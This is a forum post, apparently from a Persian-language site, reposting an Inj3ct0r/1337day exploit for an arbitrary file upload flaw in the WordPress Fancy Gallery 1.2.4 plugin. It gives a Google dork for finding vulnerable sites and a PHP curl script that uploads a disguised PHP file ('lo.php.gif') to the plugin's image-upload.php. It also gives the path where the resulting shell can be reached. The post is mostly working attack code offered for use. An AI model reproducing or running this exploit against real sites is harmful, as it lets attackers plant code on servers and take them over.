SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

WordPress Fancy Gallery 1.2.4 Shell Upload

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • WordPress Fancy Gallery 1.2.4 Shell Upload

    [php]1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0 _ __ __ __ 1
    1
    /' \ __ /'__`\ /\ \__ /'__` 0
    0
    /_, ___ /_/_ ___ ,_/ / _ ___ 1
    1
    /_/ /' _ `\ \/\ \/_/_\_<_ /'___ / /`'__\ 0
    0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
    1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
    0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
    1 \ \____/ >> Exploit database separated by exploit 0
    0 \/___/ type (local, remote, DoS, etc.) 1
    1 1
    0 [+] Site : 1337day.com 0
    1 [+] Support e-mail : submit[at]1337day.com 1
    0 0
    1 ######################################### 1
    0 I'm Sammy FORGIT member from Inj3ct0r Team 1
    1 ######################################### 0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    ##################################################
    # Description : Wordpress Plugins - Fancy Gallery Arbitrary File Upload Vulnerability
    # Version : 1.2.4
    # link : http://codecanyon.net/item/fancy-gallery-wordpress-plugin/400535
    # Price : 18$
    # Date : 22-06-2012
    # Google Dork : inurl:/wp-content/plugins/radykal-fancy-gallery/
    # Site : 1337day.com Inj3ct0r Exploit Database
    # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
    ##################################################


    Exploit :

    <?php

    $uploadfile="lo.php.gif";

    $ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);

    print "$postResult";

    ?>

    Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/radykal-fancy-gallery/admin/
    Filename : $postResult output

    lo.php.gif
    <?php
    phpinfo();
    ?>


    # Site : 1337day.com Inj3ct0r Exploit Database
    [/php]
    به پایان رسیدیم اما نکردیم آغاز
    فرو ریخت پرها نکردیم پرواز
صبر کنید ..
X